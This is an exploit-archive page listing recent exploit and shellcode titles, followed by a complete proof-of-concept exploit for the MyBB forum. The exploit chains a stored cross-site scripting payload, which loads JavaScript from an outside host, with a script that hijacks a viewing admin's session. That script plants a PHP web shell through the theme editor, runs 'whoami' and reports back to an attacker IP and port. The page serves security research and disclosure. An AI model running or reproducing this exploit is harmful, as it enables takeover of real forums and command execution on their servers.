
51 changes to exploits/shellcodes Tor Browser < 0.3.2.10 - Use After Free (PoC) Notepad++ < 7.7 (x64) - Denial of Service SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service InputMapper 1.6.10 - Denial of Service SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH) XnConvert 1.82 - Denial of Service (PoC) SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC) SpotDialup 1.6.7 - 'Key' Denial of Service (PoC) Remote Desktop Gateway - 'BlueGate' Denial of Service (PoC) FreeBSD 12.0 - 'fd' Local Privilege Escalation iOS < 12.4.1 - 'Jailbreak' Local Privilege Escalation Easy File Sharing Web Server 7.2 - 'New User' Local Overflow (SEH) DeviceViewer 3.12.0.1 - Arbitrary Password Change Winrar 5.80 - XML External Entity Injection Microsoft Windows Media Center WMV / WMA 6.3.9600.16384 - Code Execution Siemens TIA Portal - Remote Command Execution Android 7 < 9 - Remote Code Execution CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit) CoreFTP 2.0 Build 674 MDTM - Directory Traversal (Metasploit) CTROMS Terminal OS Port Portal - 'Password Reset' Authentication Bypass (Metasploit) MyBB < 1.8.21 - Remote Code Execution Nagios XI 5.6.5 - Remote Code Execution / Root Privilege Escalation Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit) Wolters Kluwer TeamMate 3.1 - Cross-Site Request Forgery Publisure Hybrid - Multiple Vulnerabilities NetGain EM Plus 10.1.68 - Remote Command Execution Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection WordPress Plugin ARforms 3.7.1 - Arbitrary File Deletion DotNetNuke 9.3.2 - Cross-Site Scripting VehicleWorkshop 1.0 - 'bookingid' SQL Injection WordPress Plugin Tutor.1.5.3 - Local File Inclusion WordPress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting WordPress Plugin Wordfence.7.4.5 - Local File Disclosure WordPress Plugin contact-form-7 5.1.6 - Remote File Upload WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion WordPress Plugin WOOF Products Filter for WooCommerce 1.2.3 - Persistent Cross-Site Scripting WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting Joomla! 3.9.0 < 3.9.7 - CSV Injection PlaySMS 1.4.3 - Template Injection / Remote Code Execution Wing FTP Server - Authenticated CSRF (Delete Admin) WordPress Plugin Custom Searchable Data System - Unauthenticated Data M]odification UADMIN Botnet 1.0 - 'link' SQL Injection Joomla! Component ACYMAILING 3.9.0 - Unauthenticated Arbitrary File Upload Wordpress Plugin PicUploader 1.0 - Remote File Upload PHP-Fusion 9.03.50 - 'panels.php' Remote Code Execution WordPress Plugin Helpful 2.4.11 - SQL Injection Prestashop 1.7.6.4 - Cross-Site Request Forgery WordPress Plugin Simple File List 5.4 - Remote Code Execution Library CMS Powerful Book Management System 2.2.0 - Session Fixation Joomla! J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) Joomla! J2 Store 3.3.11 - 'filter_order_Dir' Authenticated SQL Injection Beauty Parlour Management System 1.0 - Authentication Bypass Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes) Windows/x64 - WinExec Add-Admin (ROOT/I@mR00T$) Dynamic Null-Free Shellcode (210 Bytes) Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes) Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)
109 lines
No EOL
4.9 KiB
PHP
109 lines
No EOL
4.9 KiB
PHP
/*
|
|
# Exploit Title: MyBB < 1.8.21 Authenticated RCE
|
|
# Date: July 24, 2019
|
|
# Exploit Author: Giovanni Chhatta (https://www.linkedin.com/in/giovannichhatta/)
|
|
# Vendor Homepage: https://mybb.com/
|
|
# Software Link: https://resources.mybb.com/downloads/mybb_1820.zip
|
|
# Version: 1.8.20
|
|
# Tested on: Windows 10
|
|
# Blog: https://blog.ripstech.com/2019/mybb-stored-xss-to-rce/
|
|
|
|
Example payload: [video=youtube]http://test/test#[url]onload='script=document.createElement(%22script%22);script.src=%22https://giovan.nl/mybb.js%22;document.body.append(script);'//[/url][/video]
|
|
This payload fetches another JS file (mybb.js), hosted on a VPS.
|
|
|
|
NOTE: Mybb's textbox will dynamically change apostrophes (') to ' . To fix this just manually change them back to apostrophes and hit 'send'.
|
|
The payload will trigger once an admin views the message.
|
|
*/
|
|
|
|
/*
|
|
* mybb.js
|
|
*/
|
|
|
|
function postReq(toUrl,body,setHeaders = true){
|
|
var xhr = new XMLHttpRequest();
|
|
xhr.open("POST",toUrl,false);
|
|
|
|
if(setHeaders){
|
|
xhr.setRequestHeader("User-Agent","Mozilla/5.0 (Windows NT 10.0; WOW64; rv:66.0) Gecko/20100101 Firefox/66.0");
|
|
xhr.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
|
|
xhr.setRequestHeader("Accept-Language","nl,en-US;q=0.7,en;q=0.3");
|
|
xhr.setRequestHeader("Content-Type","multipart/form-data; boundary=---------------------------21840354016818");
|
|
xhr.setRequestHeader("Upgrade-Insecure-Requests","1");
|
|
}else{
|
|
xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
|
|
}
|
|
xhr.send(body);
|
|
}
|
|
|
|
function getReq(toUrl, property = true){
|
|
var xhr = new XMLHttpRequest();
|
|
|
|
xhr.open("GET",toUrl,false);
|
|
xhr.send();
|
|
|
|
prop = property ? xhr.responseText : xhr.status;
|
|
return prop;
|
|
}
|
|
|
|
function upload(url,key,payload){
|
|
url = url + "admin/index.php?module=style-themes&action=import";
|
|
data = "-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"my_post_key\"\r\n\r\n"+key+"\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"import\"\r\n\r\n0\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"local_file\"; filename=\"shel1l.xml\"\r\nContent-Type: text/xml\r\n\r\n"+payload+"\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"url\"\r\n\r\n\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"tid\"\r\n\r\n1\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\n\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"version_compat\"\r\n\r\n1\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"import_stylesheets\"\r\n\r\n1\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"import_templates\"\r\n\r\n1\r\n-----------------------------21840354016818--\r\n";
|
|
postReq(url,data);
|
|
}
|
|
|
|
function fakeDiv(body){
|
|
var div = document.createElement('div');
|
|
div.innerHTML = body;
|
|
div.setAttribute("id","fakediv");
|
|
|
|
document.body.append(div);
|
|
var themeLink = document.getElementsByClassName("popup_item")[2].href;
|
|
var themeID = themeLink.substring(themeLink.indexOf("tid")+4,themeLink.length);
|
|
document.getElementById("fakediv").remove();
|
|
return themeID;
|
|
}
|
|
|
|
function getThemeID(url){
|
|
url = url + "admin/index.php?module=style-themes";
|
|
responseBody = getReq(url);
|
|
return fakeDiv(responseBody);
|
|
}
|
|
|
|
function editStylesheet(url,key,tid,filename){
|
|
url = url + "admin/index.php?module=style-themes&action=edit_stylesheet&mode=advanced";
|
|
data = "my_post_key="+key+"&tid="+tid+"&file="+filename+"&stylesheet=%3C%3Fphp+system%28%24_GET%5B1%5D%29%3B+%3F%3E&save=Save+Changes";
|
|
|
|
postReq(url,data,false);
|
|
|
|
}
|
|
|
|
function checkShell(url,theme,filename){
|
|
url = url + "cache/themes/theme" + theme + "/" + filename;
|
|
if(getReq(url,false) == 200){
|
|
console.log("[*] Shell found in theme " + theme);
|
|
window.open(host + "cache/themes/theme"+theme+"/"+filename+"?1=whoami");
|
|
}else{
|
|
console.log("[!] Exploit failed: Couldn't find shell.")
|
|
}
|
|
}
|
|
|
|
function callHome(theme){
|
|
let IP = "10.11.6.96"; // Change this
|
|
let port = 1234; // Change this
|
|
|
|
let url = "http://" + IP + ":" + port + "/" + document.domain + "/isPwned/theme" + theme;
|
|
|
|
getReq(url);
|
|
}
|
|
|
|
isAdmin = false;
|
|
|
|
host = location.href.split('/')[0] + "//" + location.href.split('/')[2] + "/mybb/"; // Change last part
|
|
key = document.getElementsByName("my_post_key")[0].value;
|
|
filename = "910910910910910910910910xD.php";
|
|
payload = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<theme>\r\n<stylesheets>\r\n<stylesheet name=\""+filename+".css\">\r\ngecko\r\n</stylesheet>\r\n</stylesheets>\r\n</theme>"
|
|
upload(host,key,payload);
|
|
theme = getThemeID(host);
|
|
editStylesheet(host,key,theme,filename);
|
|
|
|
isAdmin ? checkShell(host,theme,filename) : callHome(theme); |